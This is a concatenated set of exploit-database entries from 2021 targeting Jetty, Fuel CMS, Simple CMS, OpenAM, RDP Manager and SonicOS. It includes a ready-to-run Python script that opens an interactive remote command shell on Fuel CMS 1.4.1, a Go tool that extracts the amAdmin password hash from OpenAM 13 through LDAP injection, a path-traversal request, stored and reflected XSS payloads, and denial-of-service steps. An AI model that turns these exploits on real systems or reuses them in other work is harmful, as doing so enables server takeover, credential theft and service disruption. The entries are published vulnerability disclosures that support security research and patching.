# Exploit Author: Mayank Deshmukh
# Vendor Homepage: https://www.eclipse.org/jetty/
# Software Link: https://repo1.maven.org/maven2/org/eclipse/jetty/jetty-distribution/
# Version: 9.4.37 ≤ version < 9.4.43, 10.0.1 ≤ version < 10.0.6, 11.0.1 ≤ version < 11.0.6
# Security Advisory: https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm
# Tested on: Kali Linux
# CVE : CVE-2021-34429
# Github POC: https://github.com/ColdFusionX/CVE-2021-34429
POC - Access WEB-INF/web.xml
## Request
GET /%u002e/WEB-INF/web.xml HTTP/1.1
Host: localhost:9006
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
## Response
HTTP/1.1 200 OK
Connection: close
Last-Modified: Wed, 03 Nov 2021 08:25:24 GMT
Content-Type: application/xml
Accept-Ranges: bytes
Content-Length: 209
Server: Jetty(11.0.5)
<!DOCTYPE web-app PUBLIC
"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
"http://java.sun.com/dtd/web-app_2_3.dtd" >
<web-app>
<display-name>ColdFusionX - Web Application</display-name>
</web-app>
# Exploit Title: Fuel CMS 1.4.1 - Remote Code Execution (3)
# Exploit Author: Padsala Trushal
# Date: 2021-11-03
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763
#!/usr/bin/python3
import requests
from urllib.parse import quote
import argparse
import sys
from colorama import Fore, Style
def get_arguments():
parser = argparse.ArgumentParser(description='fuel cms fuel CMS 1.4.1 - Remote Code Execution Exploit',usage=f'python3 {sys.argv[0]} -u <url>',epilog=f'EXAMPLE - python3 {sys.argv[0]} -u http://10.10.21.74')
parser.add_argument('-v','--version',action='version',version='1.2',help='show the version of exploit')
parser.add_argument('-u','--url',metavar='url',dest='url',help='Enter the url')
args = parser.parse_args()
if len(sys.argv) <=2:
parser.print_usage()
sys.exit()
return args
args = get_arguments()
url = args.url
if "http" not in url:
sys.stderr.write("Enter vaild url")
sys.exit()
try:
r = requests.get(url)
if r.status_code == 200:
print(Style.BRIGHT+Fore.GREEN+"[+]Connecting..."+Style.RESET_ALL)
except requests.ConnectionError:
print(Style.BRIGHT+Fore.RED+"Can't connect to url"+Style.RESET_ALL)
sys.exit()
while True:
cmd = input(Style.BRIGHT+Fore.YELLOW+"Enter Command $"+Style.RESET_ALL)
main_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+quote(cmd)+"%27%29%2b%27"
r = requests.get(main_url)
#<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">
output = r.text.split('<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">')
print(output[0])
if cmd == "exit":
break
# Exploit Title: Simplephpscripts Simple CMS 2.1 - 'Multiple' Stored Cross-Site Scripting (XSS)
# Date: 2021-10-19
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://simplephpscripts.com/simple-cms-php
# Version: 2.1
# Tested on: Linux
Document Title:
===============
Simplephpscripts Simple CMS v2.1 - Persistent Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2302
Release Date:
=============
2021-10-19
Vulnerability Laboratory ID (VL-ID):
====================================
2302
Common Vulnerability Scoring System:
====================================
5.3
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
The system could be used only in already existing websites to control their page sections and contents.
Just paste a single line of code on your web page section and start controlling it through the admin area.
Very simple installation - one step installation wizard. Option to include contents into web page sections
through php include, javascript or iframe embed. Any language support. WYSIWYG(text) editor to styling and
format contents of the sections. Suitable for web designers who work with Mobirise, Xara and other web builders.
(Copy of the Homepage: https://simplephpscripts.com/simple-cms-php )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent cross site scripting vulnerability in the Simplephpscripts Simple CMS v2.1 web-application.
Affected Product(s):
====================
Simplephpscripts
Product: Simple CMS v2.1 - Content Management System (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-09-03: Researcher Notification & Coordination (Security Researcher)
2021-09-04: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-19: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Full Authentication (Admin/Root Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the Simplephpscripts Simple CMS v2.1 web-application.
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise
browser to web-application requests from the application-side.
The persistent cross site web vulnerability is located in `name`, `username`, `password` parameters of the `newUser`
or `editUser` modules. Remote attackers with privileged application user account and panel access are able to inject
own malicious script code as credentials. The injected code executes on preview of the users list. The request method
to inject is post and the attack vector is persistent.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent
external redirects to malicious source and persistent manipulation of affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] newUser
[+] editUser
Vulnerable File(s):
[+] admin.php?act=users
Vulnerable Input(s):
[+] Name
[+] Username
[+] Password
Vulnerable Parameter(s):
[+] name
[+] username
[+] password
Affected Module(s):
[+] Users (act=users) (Backend)
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with privileged account and with low user interaction.
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.
PoC: Payload
"><img src='31337'onerror=alert(0)></img>
Vulnerable Source: admin.php?act=users
<tbody><tr>
<td class="headlist"><a href="admin.php?act=users&orderType=DESC&orderBy=name">Name</a></td>
<td class="headlist" width="23%"><a href="admin.php?act=users&orderType=DESC&orderBy=email">Email</a></td>
<td class="headlist" width="23%"><a href="admin.php?act=users&orderType=DESC&orderBy=username">Username</a></td>
<td class="headlist" width="23%">Password</td>
<td class="headlist" colspan="2"> </td>
</tr>
<tr>
<td class="bodylist">c"><img src='31337'onerror=alert(0)></img></td>
<td class="bodylist">keymaster23@protonmail.com</td>
<td class="bodylist">d"><img src='31337'onerror=alert(0)></img></td>
<td class="bodylist">e"><img src='31337'onerror=alert(0)></img></td>
<td class="bodylistAct"><a href="admin.php?act=editUser&id=7" title="Edit"><img class="act" src="images/edit.png" alt="Edit"></a></td>
<td class="bodylistAct"><a class="delete" href="admin.php?act=delUser&id=7" onclick="return confirm('Are you sure you want to delete it?');"
title="DELETE"><img class="act" src="images/delete.png" alt="DELETE"></a></td>
</tr>
--- PoC Session Logs (POST) [Create] ---
https://simple-cms.localhost:8000/simplecms/admin.php
Host: simple-cms.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 141
Origin: https://simple-cms.localhost:8000
Connection: keep-alive
Referer: https://simple-cms.localhost:8000/simplecms/admin.php?act=newUser
Cookie: PHPSESSID=9smae9mm1m1misttrp1a2e1p23
act=addUser&name=c"><img src='31337'onerror=alert(0)></img>&email=tester23@test.de
&username=d"><img src='31337'onerror=alert(0)></img>
&password=e"><img src='31337'onerror=alert(0)></img>&submit=Add User
-
POST: HTTP/2.0 200 OK
server: Apache
content-length: 5258
content-type: text/html; charset=UTF-8
-
https://simple-cms.localhost:8000/simplecms/31337
Host: simple-cms.localhost:8000
Accept: image/webp,*/*
Connection: keep-alive
Referer: https://simple-cms.localhost:8000/simplecms/admin.php
Cookie: PHPSESSID=9smae9mm1m1misttrp1a2e1p23
-
GET: HTTP/2.0 200 OK
server: Apache
content-length: 196
content-type: text/html; charset=iso-8859-1
Reference(s):
https://simple-cms.localhost:8000/simplecms/admin.php
https://simple-cms.localhost:8000/simplecms/admin.php
https://simple-cms.localhost:8000/simplecms/admin.php?act=newUser
Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
LUDWIG-ERHARD STRAßE 4
34131 KASSEL - HESSEN
DEUTSCHLAND (DE)
# Exploit Title: OpenAM 13.0 - LDAP Injection
# Date: 03/11/2021
# Exploit Author: Charlton Trezevant, GuidePoint Security
# Vendor Homepage: https://www.forgerock.com/
# Software Link: https://github.com/OpenIdentityPlatform/OpenAM/releases/tag/13.0.0,
# https://backstage.forgerock.com/docs/openam/13/install-guide/index.html#deploy-openam
# Version: OpenAM v13.0.0
# Tested on: go1.17.2 darwin/amd64
# CVE: CVE-2021-29156
#
# This vulnerability allows an attacker to extract a variety of information
# (such as a user’s password hash) from vulnerable OpenAM servers via LDAP
# injection, using a character-by-character brute force attack.
#
# https://github.com/guidepointsecurity/CVE-2021-29156
# https://nvd.nist.gov/vuln/detail/CVE-2021-29156
# https://portswigger.net/research/hidden-oauth-attack-vectors
package main
// All of these dependencies are included in the standard library.
import (
"container/ring"
"fmt"
"math/rand"
"net/http"
"net/url"
"sync"
"time"
)
func main() {
// Base URL of the target OpenAM instance
baseURL := "http://localhost/openam/"
// Local proxy (such as Burp)
proxy := "http://localhost:8080/"
// Username whose hash should be dumped
user := "amAdmin"
// Configurable ratelimit
// This script can go very, very fast. But it's likely that would overload Burp and the target server.
// The default ratelimit of 6 can retrieve a 60 character hash through a proxy in about 5 minutes and
// ~1700 requests.
rateLimit := 6
// Beginning of the LDAP injection payload. %s denotes the position of the username.
payloadUsername := fmt.Sprintf(".well-known/webfinger?resource=http://x/%s)", user)
partURL := fmt.Sprintf("%s%s", baseURL, payloadUsername)
// Your LDAP injection payloads. %s denotes the position at which the constructed hash + next test character
// will be inserted.
// These are configured to dump password hashes. But you can reconfigure them to dump other data, such as
// usernames/session IDs/etc depending on your use case.
// N.B. you will likely need to update the brute-forcing keyspace depending on the data you're trying to dump.
testCharPayload := "(sunKeyValue=userPassword=%s*)(%%2526&rel=http://openid.net/specs/connect/1.0/issuer"
testCrackedPayload := "(sunKeyValue=userPassword=%s)(%%2526&rel=http://openid.net/specs/connect/1.0/issuer"
// The keyspace for brute-forcing individual characters is stored in a ringbuffer
// You may need to change how this is initialized depending on the types of data you're
// trying to retrieve. By default, this is configured for password hashes.
dict := makeRing()
// Working characters for each step are concatenated with this string. Further tests are conducted
// using this value as it's built.
// Importantly, if you already have part of the hash you can put it here as a crib. This allows you
// to resume a previous brute-forcing session.
password := ""
proxyURL, _ := url.Parse(proxy)
// You can modify the HTTP client configuration below.
// For example, to disable the HTTP proxy or set a different
// request timeout value.
client := &http.Client{
Transport: &http.Transport{
Proxy: http.ProxyURL(proxyURL),
},
Timeout: 30 * time.Second,
}
// Channels used for internal signaling
cracked := make(chan string, 1)
foundChar := make(chan string, 1)
wg := &sync.WaitGroup{}
wg.Add(1)
// All hacking tools need a header. You may experience a 10-15x performance improvement
// if you replace the flower-covered header with the gothic bleeding/flaming/skull-covered
// ASCII art typical of these kinds of tools.
printHeader()
loop:
for {
select {
case <-cracked:
// Full hash test succeeds, terminate everything
// N.B. this feature does not work, see my comments on checkCracked.
fmt.Printf("Cracked! Password hash is: \"%s\"\n", password)
wg.Done()
break loop
case char := <-foundChar:
// In the event that a test character succeeds, that thread will pass it along in the
// foundChar channel to signal success. It's then concatenated with the known-good
// password hash and the whole thing is tested in a query
// This doesn't work because OpenAM doesn't respond to direct queries containing the password hash
// in the manner I expect. But it might still work for other types of data.
password += char
fmt.Printf("Progress so far: '%s'\n", password)
// Forgive these very ugly closures
go (func(client *http.Client, url, payload *string, password string, cracked *chan string) {
// Add random jitter before submitting request
time.Sleep(time.Duration(rand.Intn(3)+3) * time.Microsecond)
time.Sleep(1 * time.Second)
checkCracked(client, url, payload, &password, cracked)
})(client, &partURL, &testCharPayload, password, &cracked)
default:
for i := 0; i < rateLimit-1; i++ {
testChar := dict.Value.(string)
go (func(client *http.Client, url, payload *string, password, testChar string, foundChar *chan string) {
time.Sleep(time.Duration(rand.Intn(3)+3) * time.Microsecond)
time.Sleep(1 * time.Second)
getChar(client, url, payload, &password, &testChar, foundChar)
})(client, &partURL, &testCrackedPayload, password, testChar, &foundChar)
dict = dict.Next()
}
time.Sleep(1 * time.Second)
}
}
wg.Wait()
}
// checkCracked tests a complete string in a query against the OpenAM server to
// determine whether the exact, full hash has been retrieved.
// This doesn't actually work, because the server doesn't respond as I'd expect
// A better implementation would probably watch until all positions in the ringbuffer
// are exhausted in testing and terminate (since there's no way to progress further)
func checkCracked(client *http.Client, targetURL, payload, password *string, cracked *chan string) {
fullPayload := fmt.Sprintf(*payload, url.QueryEscape(*password))
fullURL := fmt.Sprintf("%s%s", *targetURL, fullPayload)
req, err := http.NewRequest("GET", fullURL, nil)
if err != nil {
fmt.Printf("checkCracked: %s", err.Error())
return
}
res, err := client.Do(req)
if err != nil {
fmt.Printf("checkCracked: %s", err.Error())
return
}
if res.StatusCode == 200 {
*cracked <- *password
return
}
if res.StatusCode == 404 {
return
}
fmt.Printf("checkCracked: got status code of %d for payload %s", res.StatusCode, payload)
}
// getChar tests a given character at the end position of the configured payload and dumped hash progress.
func getChar(client *http.Client, targetURL, payload, password, testChar *string, foundChar *chan string) {
// Concatenate test character -> password -> payload -> attack URL
combinedPass := url.QueryEscape(fmt.Sprintf("%s%s", *password, *testChar))
fullPayload := fmt.Sprintf(*payload, combinedPass)
fullURL := fmt.Sprintf("%s%s", *targetURL, fullPayload)
req, err := http.NewRequest("GET", fullURL, nil)
if err != nil {
fmt.Printf("getChar: %s", err.Error())
return
}
res, err := client.Do(req)
if err != nil {
fmt.Printf("getChar: %s", err.Error())
return
}
if res.StatusCode == 200 {
*foundChar <- *testChar
return
}
if res.StatusCode == 404 {
return
}
fmt.Printf("getChar: got status code of %d for payload %s", res.StatusCode, payload)
}
// makeRing instantiates a ringbuffer and initializes it with test characters common in base64
// and password hash encodings.
// Bruteforcing on a character-by-character basis can only go as far as your dictionary will take
// you, so be sure to update these strings if the keyspace for your use case is different.
func makeRing() *ring.Ring {
var upcase string = `ABCDEFGHIJKLMNOPQRSTUVWXYZ`
var lcase string = `abcdefghijklmnopqrstuvwxyz`
var num string = `1234567890`
var punct string = `$+/.=`
var dictionary string = upcase + lcase + num + punct
buf := ring.New(len(dictionary))
for _, c := range dictionary {
buf.Value = fmt.Sprintf("%c", c)
buf = buf.Next()
}
return buf
}
// printHeader is cool.
func printHeader() {
fmt.Printf(`
_______ ,---. ,---. .-''-.
/ __ \ | / | | .'_ _ \
| ,_/ \__)| | | .'/ ( ' ) '
,-./ ) | | _ | |. (_ o _) |
\ '_ '') | _( )_ || (_,_)___|
> (_) ) __\ (_ o._) /' \ .---.
( . .-'_/ )\ (_,_) / \ '-' /
'-''-' / \ / \ /
'._____.' '---' ''-..-'
.'''''-. .-'''''''-. .'''''-. ,---. .'''''-. .-''''-. ,---. ,--------. .------. .---.
/ ,-. \ / ,'''''''. \ / ,-. \ /_ | / ,-. \ / _ _ \ /_ | | _____| / .-. \ \ /
(___/ | ||/ .-./ ) \| (___/ | | ,_ | (___/ | || ( ' ) | ,_ | | ) / / '--' | |
.' / || \ '_ .')|| .' / ,-./ )| _ _ _ _ .' / | (_{;}_) |,-./ )| | '----. | .----. \ /
_.-'_.-' ||(_ (_) _)|| _.-'_.-' \ '_ '') ( ' )--( ' ) _.-'_.-' | (_,_) |\ '_ '')|_.._ _ '. | _ _ '. v
_/_ .' || / . \ || _/_ .' > (_) )(_{;}_)(_{;}_)_/_ .' \ | > (_) ) ( ' ) \| ( ' ) \ _ _
( ' )(__..--.|| '-''"' || ( ' )(__..--.( . .-' (_,_)--(_,_)( ' )(__..--. '----' |( . .-' _(_{;}_) || (_{;}_) |(_I_)
(_{;}_) |\'._______.'/(_{;}_) | '-''-'| (_{;}_) | .--. / / '-''-'| | (_,_) / \ (_,_) /(_(=)_)
(_,_)-------' '._______.' (_,_)-------' '---' (_,_)-------' )_____.' '---' '...__..' '...__..' (_I_)
~ ~ (c) 2021 GuidePoint Security - charlton.trezevant@guidepointsecurity.com ~ ~
`)
}
# Exploit Title: RDP Manager 4.9.9.3 - Denial-of-Service (PoC)
# Date: 2021-10-18
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://www.cinspiration.de/uebersicht4.html
# Software Link: https://www.cinspiration.de/download.html
# Version: 4.9.9.3
# Tested on: Linux
Document Title:
===============
RDP Manager v4.9.9.3 - Local Denial of Servie Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2309
Release Date:
=============
2021-10-18
Vulnerability Laboratory ID (VL-ID):
====================================
2309
Common Vulnerability Scoring System:
====================================
3.6
Vulnerability Class:
====================
Denial of Service
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
RDP-Manager is a program for the better administration of several remote desktops and further connections. The connection parameters
as well as user name and password can be stored in the program, the latter also encrypted by an external password if desired. When opened,
the connections created are clearly structured in individual tabs in the application window, which means that the overview is retained even
if several connections are open.
(Copy of the Homepage: https://www.cinspiration.de/download.html )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a local denial of service vulnerability in the RDP Manager v4.9.9.3 windows software client.
Vulnerability Disclosure Timeline:
==================================
2021-06-01: Researcher Notification & Coordination (Security Researcher)
2021-06-02: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-18: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Local
Severity Level:
===============
Low
Authentication Type:
====================
Restricted Authentication (User Privileges)
User Interaction:
=================
No User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
A local denial of service vulnerability has been discovered in the official RDP Manager v4.9.9.3 windows software client.
The denial of service attack allows an attacker to freeze, block or crash a local process, service or component to compromise.
The local vulnerability is located in the Verbindungsname and Server input fields of the Verbindung (Neu/Bearbeiten).
The Verbindungsname and Server inputs are not limited by the size of characters. Thus allows a local privileged attacker
to add a malformed server entry with a large size that crashs (multiple application errors) the application permanently.
The entry can be modified as zip backup for imports as sqLitedatabase.db3 to make the software unusable until a full
reinstall with separate deletes is performed to recover.
Successful exploitation of the denial of service vulnerability results in permanent unhandled software and application crashs.
Vulnerable Input(s):
[+] Verbindungsname
[+] Server
Affected Module(s):
[+] Wiederherstellen (sqLitedatabase.db3)
Proof of Concept (PoC):
=======================
The local denial of service vulnerability can be exploited by attackers with system access privileges without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce ...
1. Install the RDP-Manager.exe software for windows
2. Start the software and add a new entry in the main tab
3. Include a large amount of characters max 1024 and save the entry
4. The software freezes and crashs with multiple errors in the actual session and after restart it crash permanently as well
Note: Alternativly you can export a database with regular valid entry and modify it via backup for a import
5. Successful reproduce of the local denial of service vulnerability!
Credits & Authors:
==================
N/A - Anonymous [research@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=N%2FA+-+Anonymous
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: https://www.vulnerability-lab.com ; https://www.vuln-lab.com ; https://www.vulnerability-db.com
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
LUDWIG-ERHARD STRAßE 4
34131 KASSEL - HESSEN
DEUTSCHLAND (DE)
# Exploit Title: Sonicwall SonicOS 6.5.4 - 'Common Name' Cross-Site Scripting (XSS)
# Date: 2021-10-18
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://www.sonicguard.com/NSV-800.asp
# Version: 6.5.4
Document Title:
===============
Sonicwall SonicOS 6.5.4 - Cross Site Scripting Web Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2272
Release Date:
=============
2021-10-18
Vulnerability Laboratory ID (VL-ID):
====================================
2272
Common Vulnerability Scoring System:
====================================
5
Vulnerability Class:
====================
Cross Site Scripting - Non Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
The design, implementation and deployment of modern network architectures, such as virtualization and cloud, continue to be a game-changing
strategy for many organizations. Virtualizing the data center, migrating to the cloud, or a combination of both, demonstrates significant
operational and economic advantages. However, vulnerabilities within virtual environments are well-documented. New vulnerabilities are
discovered regularly that yield serious security implications and challenges. To ensure applications and services are delivered safely,
efficiently and in a scalable manner, while still combating threats harmful to all parts of the virtual framework including virtual
machines (VMs), application workloads and data must be among the top priorities.
(Copy of the Homepage: https://www.sonicguard.com/NSV-800.asp )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a non-persistent cross site scripting web vulnerability in the SonicWall SonicOS 6.5.4.
Affected Product(s):
====================
Model: SonicWall SonicOS
Firmware: 6.5.4.4-44v-21-1288-aa5b8b01 (6.5.4)
OS: SonicOS Enhanced
Vulnerability Disclosure Timeline:
==================================
2021-07-24: Researcher Notification & Coordination (Security Researcher)
2021-07-25: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-18: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (Guest Privileges)
User Interaction:
=================
Medium User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
A client-side input validation vulnerability has been discovered in the official SonicWall SonicOS 6.5.4.
The vulnerability allows remote attackers to hijack sessionc credentials or manipulate client-side requested application content.
The vulnerability is located in the common name input field in the Decryption Service - Common Name - Show Connection Failures module.
Remote attackers with low privileged user accounts can inject own script codes to compromise session credentials. It is also possible
to build special crafted html pages with get / post method requests to hijack non-expired user account sessions. The request method to
inject is get and the attack vector is located on the client-side without being persistent.
Successful exploitation of the vulnerability allows remote attackers to hijack session credentials (non-persistent), phishing
(non-persistent), external redirect to malicious sources (non-persistent) or client-side application content manipulation.
Exploitation of the vulnerability requires low or medium user interaction or a low privileged (restricted) user account.
Module(s):
[+] Decryption Service
Vulnerable Function(s):
[+] Edit (Bearbeiten)
Vulnerable Parameter(s):
[+] Common Name
Affected Module(s):
[+] Show Connection Failures
Proof of Concept (PoC):
=======================
The client-side cross site scripting web vulnerability can be exploited by remote attackers with user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Login as restricted or privileged user to the sonicWall sonicOS 6.5.4 virtual firewall application
2. Open the Decryption Service > Common Name > Show Connection Failures
3. Click on Edit and inject a js test payload into the restricted client content
4. Pushing anywhere else outsite field will temporarily save the payload
5. The script code immediately executes in the web browsers context
5. Successful reproduce of the script code inject web vulnerability!
Vulnerable Source: Connection Failure List (getConnFailureList.json)
<div id="connFailureEntriesDiv" style="overflow-y: scroll; height: 544px;">
<table summary="" width="100%" cellspacing="0" cellpadding="4" border="0">
<tbody id="connFailureEntries"><tr><td class="listItem" width="5%"><input type="checkbox"
id="failChk4181252134" class="failChk" data-id="4181251300" data-name="sfPKI-4411CA162CD7931145552C4C87F9603D55FC.22"
data-override-name="><iframe src=evil.source onload=alert(document.domain)>" data-failure="7" onclick="onClickFailCheckbox(this);"></td>
<td class="listItem" width="15%">192.168.XX.XX</td><td class="listItem" width="15%">XX.XX.XX.XX</td>
<td class="listItem" width="30%">>"<iframe src="evil.source" onload="alert(document.domain)"></iframe></td>
--- PoC Session Logs (Cookie: SessId=F0FF65AA4C2B22B0655546584DCFAF65) ---
https://nsv800.localhost:9281/evil.source
Host: nsv800.localhost:9281
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://nsv800.localhost:9281/sslSpyConfigure.html
Cookie: temp=; SessId=F0FF65AA4C2B22B0655546584DCFAF65
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.0 200 OK
Server: SonicWALL
Content-type: text/html;charset=UTF-8
-
https://nnsv800.localhost:9281/getJsonData.json?dataSet=alertStatus&_=1625248460727
Host: nsv800.localhost:9281
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: https://nsv800.localhost:9281/logo.html
Cookie: temp=; SessId=F0FF65AA4C2B22B0655546584DCFAF65
-
GET: HTTP/1.0 200 OK
Server: SonicWALL
Content-type: application/json
Accept-Ranges: bytes
Reference(s):
nsv800.localhost:9281/main.html
nsv800.localhost:9281/getJsonData.json
nsv800.localhost:9281/sslSpyConfigure.html
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the client-side reflected script code through getJsonData.json and sslSpyConfigure.
The input and output parameters needs to be sanitized to prevent script code injects.
Security Risk:
==============
The security risk of the client-side cross site web vulnerability in the sonicwall sonicos series is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
